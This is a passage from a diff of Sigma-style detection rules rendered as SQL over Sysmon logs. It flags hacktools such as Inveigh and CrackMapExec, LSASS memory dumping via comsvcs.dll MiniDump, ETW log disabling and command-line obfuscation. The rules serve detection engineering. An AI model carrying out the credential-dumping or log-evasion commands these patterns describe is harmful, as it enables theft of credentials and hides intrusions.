LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "Use of PktMon.exe", - "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "status": "test", - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "author": "frack113", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1040" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (Image LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pktmon.yml" + "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "CL_Mutexverifiers.ps1 Proxy Execution", - "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands", - "author": "oscd.community, Natalia Shornikova, frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "status": "test", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "Browser Started with Remote Debugging", - "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "title": "Potential Dosfuscation Activity", + "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "status": "experimental", - "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible payload obfuscation via the commandline", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (Image LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_remote_debugging.yml" + "filename": "proc_creation_win_cmd_dosfuscation.yml" }, { - "title": "Detection of PowerShell Execution via Sqlps.exe", - "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.community", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.execution", + "attack.defense_evasion", "attack.t1059.001", + "attack.t1027" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" + }, + { + "title": "New Root Certificate Installed Via CertMgr.EXE", + "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", + "status": "test", + "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1553.004" ], "falsepositives": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" + "filename": "proc_creation_win_certmgr_certificate_installation.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", - "status": "test", - "description": "Detects suspicious and uncommon child processes of WmiPrvSE", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Persistence Attempt Via Existing Service Tampering", - "id": "38879043-7e1e-47a9-8d46-6bec88e201df", - "status": "test", - "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", - "author": "Sreeman", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "status": "experimental", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003", "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "Windows Credential Manager Access via VaultCmd", - "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "status": "experimental", - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_vaultcmd_list_creds.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "RDP Port 